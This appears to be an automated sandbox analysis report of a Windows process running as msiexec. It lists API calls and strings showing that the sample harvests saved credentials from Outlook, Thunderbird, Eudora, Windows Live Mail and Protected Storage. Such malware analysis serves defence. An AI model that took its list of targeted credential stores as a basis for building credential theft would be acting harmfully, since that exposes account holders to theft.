33850->33851 33850->33852 33851->33852 33852->33847 33852->33848 33854 410dbb 7 API calls 33853->33854 33855 444329 33854->33855 33952 40759e strlen strlen 33855->33952 33860 410dbb 7 API calls 33861 444350 33860->33861 33862 40759e 3 API calls 33861->33862 33863 44435a 33862->33863 33864 444212 64 API calls 33863->33864 33865 444366 memset memset 33864->33865 33866 410b1e RegQueryValueExA 33865->33866 33867 4443b9 ExpandEnvironmentStringsA strlen 33866->33867 33868 4443f4 _strcmpi 33867->33868 33869 4443e5 33867->33869 33870 403e91 33868->33870 33871 44440c 33868->33871 33869->33868 33870->33503 33872 444212 64 API calls 33871->33872 33872->33870 33873->33656 33874->33657 33875->33664 33876->33666 33877->33667 33878->33685 33879->33687 33880->33717 33881->33712 33883 40841c 33882->33883 33883->33724 33884->33728 33885->33728 33886->33728 33887->33728 33888->33738 33889->33738 33890->33738 33892 404656 FreeLibrary 33891->33892 33893 4045e3 LoadLibraryA 33892->33893 33894 404651 33893->33894 33895 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33893->33895 33894->33743 33894->33747 33896 40463d 33895->33896 33897 404643 33896->33897 33898 404656 FreeLibrary 33896->33898 33897->33894 33898->33894 33900 404666 33899->33900 33901 40465c FreeLibrary 33899->33901 33900->33654 33901->33900 33902->33753 33903->33760 33904->33763 33905->33760 33906->33760 33907->33782 33908->33782 33909->33782 33910->33788 33911->33790 33912->33791 33913->33795 33914->33796 33915->33796 33916->33805 33917->33802 33918->33811 33937 40466b _mbscpy 33919->33937 33921 40f6fa 33922 4045db 7 API calls 33921->33922 33923 40f708 33922->33923 33925 404734 3 API calls 33923->33925 33929 40f7e2 33923->33929 33924 404656 FreeLibrary 33926 40f7f1 33924->33926 33930 40f715 33925->33930 33927 404785 FreeLibrary 33926->33927 33928 40f7fc 33927->33928 33928->33811 33929->33924 33930->33929 33931 40f797 WideCharToMultiByte 33930->33931 33932 40f7b8 strlen 33931->33932 33933 
40f7d9 LocalFree 33931->33933 33932->33933 33934 40f7c8 _mbscpy 33932->33934 33933->33929 33934->33933 33935->33811 33936->33811 33937->33921 33939 44458b 33938->33939 33940 40381a 33939->33940 33948 410add RegQueryValueExA 33939->33948 33940->33819 33946 4021b6 memset 33940->33946 33942 4445a4 33942->33940 33949 410add RegQueryValueExA 33942->33949 33944 4445c1 33944->33940 33950 444879 30 API calls 33944->33950 33946->33821 33947->33819 33948->33942 33949->33944 33950->33940 33951->33838 33953 4075c9 33952->33953 33954 4075bb _mbscat 33952->33954 33955 444212 33953->33955 33954->33953 33972 407e9d 33955->33972 33958 44424d 33959 444274 33958->33959 33960 444258 33958->33960 33980 407ef8 33958->33980 33961 407e9d 9 API calls 33959->33961 33997 444196 51 API calls 33960->33997 33968 4442a0 33961->33968 33963 407ef8 9 API calls 33963->33968 33964 4442ce 33994 407f90 33964->33994 33968->33963 33968->33964 33970 444212 64 API calls 33968->33970 33990 407e62 33968->33990 33969 407f90 FindClose 33971 4442e4 33969->33971 33970->33968 33971->33860 33973 407f90 FindClose 33972->33973 33974 407eaa 33973->33974 33975 406f06 2 API calls 33974->33975 33976 407ebd strlen strlen 33975->33976 33977 407ee1 33976->33977 33978 407eea 33976->33978 33998 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33998 33978->33958 33981 407f03 FindFirstFileA 33980->33981 33982 407f24 FindNextFileA 33980->33982 33983 407f3f 33981->33983 33984 407f46 strlen strlen 33982->33984 33985 407f3a 33982->33985 33983->33984 33989 407f7f 33983->33989 33986 407f76 33984->33986 33984->33989 33987 407f90 FindClose 33985->33987 33999 4070e3 strlen _mbscat _mbscpy _mbscat 33986->33999 33987->33983 33989->33958 33991 407e94 33990->33991 33992 407e6c strcmp 33990->33992 33991->33968 33992->33991 33993 407e83 strcmp 33992->33993 33993->33991 33995 407fa3 33994->33995 33996 407f99 FindClose 33994->33996 33995->33969 33996->33995 33997->33958 33998->33978 33999->33989 34000->33516 34001->33520 34002->33527 34003->33526 
34004->33533 34005->33530 34006->33525 34024 411853 RtlInitializeCriticalSection memset 34025 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34201 40a256 13 API calls 34203 432e5b 17 API calls 34205 43fa5a 20 API calls 34027 401060 41 API calls 34208 427260 CloseHandle memset memset 34031 410c68 FindResourceA SizeofResource LoadResource LockResource 34210 405e69 14 API calls 34033 433068 15 API calls __fprintf_l 34212 414a6d 18 API calls 34213 43fe6f 134 API calls 34035 424c6d 15 API calls __fprintf_l 34214 426741 19 API calls 34037 440c70 17 API calls 34038 443c71 42 API calls 34041 427c79 24 API calls 34217 416e7e memset __fprintf_l 34045 42800b 47 API calls 34046 425115 85 API calls __fprintf_l 34220 41960c 61 API calls 34047 43f40c 122 API calls __fprintf_l 34050 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34051 43f81a 20 API calls 34053 414c20 memset memset 34054 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34224 414625 18 API calls 34225 404225 modf 34226 403a26 strlen WriteFile 34228 40422a 12 API calls 34232 427632 memset memset memcpy 34233 40ca30 59 API calls 34234 404235 26 API calls 34055 42ec34 61 API calls __fprintf_l 34056 425115 76 API calls __fprintf_l 34235 425115 77 API calls __fprintf_l 34237 44223a 38 API calls 34062 43183c 112 API calls 34238 44b2c5 _onexit __dllonexit 34243 42a6d2 memcpy __allrem 34064 405cda 60 API calls 34251 43fedc 138 API calls 34252 4116e1 16 API calls __fprintf_l 34067 4244e6 19 API calls 34069 42e8e8 127 API calls __fprintf_l 34070 4118ee RtlLeaveCriticalSection 34257 43f6ec 22 API calls 34072 425115 119 API calls __fprintf_l 34073 410cf3 EnumResourceNamesA 34260 4492f0 memcpy memcpy 34262 43fafa 18 API calls 34264 4342f9 15 API calls __fprintf_l 34074 4144fd 19 API calls 34266 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34267 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34270 443a84 _mbscpy 34272 43f681 
17 API calls 34077 404487 22 API calls 34274 415e8c 16 API calls __fprintf_l 34081 411893 RtlDeleteCriticalSection __fprintf_l 34082 41a492 42 API calls 34278 403e96 34 API calls 34279 410e98 memset SHGetPathFromIDList SendMessageA 34084 426741 109 API calls __fprintf_l 34085 4344a2 18 API calls 34086 4094a2 10 API calls 34088 4108a4 7 API calls 34282 4116a6 15 API calls __fprintf_l 34283 43f6a4 17 API calls 34284 440aa3 20 API calls 34286 427430 45 API calls 34090 4090b0 7 API calls 34091 4148b0 15 API calls 34093 4118b4 RtlEnterCriticalSection 34094 4014b7 CreateWindowExA 34095 40c8b8 19 API calls 34097 4118bf RtlTryEnterCriticalSection 34291 42434a 18 API calls __fprintf_l 34293 405f53 12 API calls 34105 43f956 59 API calls 34107 40955a 17 API calls 34108 428561 36 API calls 34109 409164 7 API calls 34297 404366 19 API calls 34301 40176c ExitProcess 34304 410777 42 API calls 34114 40dd7b 51 API calls 34115 425d7c 16 API calls __fprintf_l 34306 43f6f0 25 API calls 34307 42db01 22 API calls 34116 412905 15 API calls __fprintf_l 34308 403b04 54 API calls 34309 405f04 SetDlgItemTextA GetDlgItemTextA 34310 44b301 ??3@YAXPAX 34313 4120ea 14 API calls 3 library calls 34314 40bb0a 8 API calls 34316 413f11 strcmp 34120 434110 17 API calls __fprintf_l 34123 425115 108 API calls __fprintf_l 34317 444b11 _onexit 34125 425115 76 API calls __fprintf_l 34128 429d19 10 API calls 34320 444b1f __dllonexit 34321 409f20 _strcmpi 34130 42b927 31 API calls 34324 433f26 19 API calls __fprintf_l 34325 44b323 FreeLibrary 34326 427f25 46 API calls 34327 43ff2b 17 API calls 34328 43fb30 19 API calls 34137 414d36 16 API calls 34139 40ad38 7 API calls 34330 433b38 16 API calls __fprintf_l 34007 44b33b 34008 44b344 ??3@YAXPAX 34007->34008 34009 44b34b 34007->34009 34008->34009 34010 44b354 ??3@YAXPAX 34009->34010 34011 44b35b 34009->34011 34010->34011 34012 44b364 ??3@YAXPAX 34011->34012 34013 44b36b 34011->34013 34012->34013 34014 44b374 ??3@YAXPAX 34013->34014 34015 44b37b 34013->34015 
34014->34015 34143 426741 21 API calls 34144 40c5c3 123 API calls 34146 43fdc5 17 API calls 34331 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34149 4161cb memcpy memcpy memcpy memcpy 34336 43ffc8 18 API calls 34150 4281cc 15 API calls __fprintf_l 34338 4383cc 110 API calls __fprintf_l 34151 4275d3 41 API calls 34339 4153d3 22 API calls __fprintf_l 34152 444dd7 _XcptFilter 34344 4013de 15 API calls 34346 425115 111 API calls __fprintf_l 34347 43f7db 18 API calls 34350 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34154 4335ee 16 API calls __fprintf_l 34352 429fef 11 API calls 34155 444deb _exit _c_exit 34353 40bbf0 133 API calls 34158 425115 79 API calls __fprintf_l 34357 437ffa 22 API calls 34162 4021ff 14 API calls 34163 43f5fc 149 API calls 34358 40e381 9 API calls 34165 405983 40 API calls 34166 42b186 27 API calls __fprintf_l 34167 427d86 76 API calls 34168 403585 20 API calls 34170 42e58e 18 API calls __fprintf_l 34173 425115 75 API calls __fprintf_l 34175 401592 8 API calls 33213 410b92 33216 410a6b 33213->33216 33215 410bb2 33217 410a77 33216->33217 33218 410a89 GetPrivateProfileIntA 33216->33218 33221 410983 memset _itoa WritePrivateProfileStringA 33217->33221 33218->33215 33220 410a84 33220->33215 33221->33220 34362 434395 16 API calls 34177 441d9c memcmp 34364 43f79b 119 API calls 34178 40c599 42 API calls 34365 426741 87 API calls 34182 4401a6 21 API calls 34184 426da6 memcpy memset memset memcpy 34185 4335a5 15 API calls 34187 4299ab memset memset memcpy memset memset 34188 40b1ab 8 API calls 34370 425115 76 API calls __fprintf_l 34374 4113b2 18 API calls 2 library calls 34378 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 
33233->33234 33236 40765c 33233->33236 33234->33232 33235 4076a3 33235->33232 33236->33235 33239 40737c strtoul 33236->33239 33238->33231 33239->33236 34190 40b5bf memset memset _mbsicmp

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040832F
                                                                                        • memset.MSVCRT ref: 00408343
                                                                                        • memset.MSVCRT ref: 0040835F
                                                                                        • memset.MSVCRT ref: 00408376
                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                        • strlen.MSVCRT ref: 004083E9
                                                                                        • strlen.MSVCRT ref: 004083F8
                                                                                        • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                        • String ID: 5$H$O$b$i$}$}
                                                                                        • API String ID: 1832431107-3760989150
                                                                                        • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                        • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                        • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                        • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                        • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                        • strlen.MSVCRT ref: 00407F5C
                                                                                        • strlen.MSVCRT ref: 00407F64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindstrlen$FirstNext
                                                                                        • String ID: ACD
                                                                                        • API String ID: 379999529-620537770
                                                                                        • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                        • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                        • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                        • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00401E8B
                                                                                        • strlen.MSVCRT ref: 00401EA4
                                                                                        • strlen.MSVCRT ref: 00401EB2
                                                                                        • strlen.MSVCRT ref: 00401EF8
                                                                                        • strlen.MSVCRT ref: 00401F06
                                                                                        • memset.MSVCRT ref: 00401FB1
                                                                                        • atoi.MSVCRT(?), ref: 00401FE0
                                                                                        • memset.MSVCRT ref: 00402003
                                                                                        • sprintf.MSVCRT ref: 00402030
                                                                                        • memset.MSVCRT ref: 00402086
                                                                                        • memset.MSVCRT ref: 0040209B
                                                                                        • strlen.MSVCRT ref: 004020A1
                                                                                        • strlen.MSVCRT ref: 004020AF
                                                                                        • strlen.MSVCRT ref: 004020E2
                                                                                        • strlen.MSVCRT ref: 004020F0
                                                                                        • memset.MSVCRT ref: 00402018
                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                        • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                        • API String ID: 3833278029-4223776976
                                                                                        • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                        • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                        • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                        • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                          • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                          • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                          • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                        • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                        • API String ID: 745651260-375988210
                                                                                        • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                        • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                        • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                        • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                        Strings
                                                                                        • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                        • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                        • PStoreCreateInstance, xrefs: 00403C44
                                                                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                        • pstorec.dll, xrefs: 00403C30
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                        • API String ID: 1197458902-317895162
                                                                                        • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                        • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                        • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                        • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                        • String ID:
                                                                                        • API String ID: 3662548030-0
                                                                                        • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                        • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                        • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                        • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0044430B
                                                                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                          • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                          • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                          • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                        • memset.MSVCRT ref: 00444379
                                                                                        • memset.MSVCRT ref: 00444394
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                        • strlen.MSVCRT ref: 004443DB
                                                                                        • _strcmpi.MSVCRT ref: 00444401
                                                                                        Strings
                                                                                        • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                        • Store Root, xrefs: 004443A5
                                                                                        • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                        • API String ID: 3203569119-2578778931
                                                                                        • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                        • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                        • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                        • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 2054149589-0
                                                                                        • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                        • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                        • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                        • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor_mbsicmpqsort
                                                                                        • String ID: /nosort$/sort
                                                                                        • API String ID: 882979914-1578091866
                                                                                        • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                        • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                        • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                        • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004109F7
                                                                                          • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                          • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                        • memset.MSVCRT ref: 00410A32
                                                                                        • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3143880245-0
                                                                                        • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                        • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                        • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                        • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                        • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                        • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                        • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                          • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                        • memset.MSVCRT ref: 00410E10
                                                                                        • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                        • API String ID: 119022999-2036018995
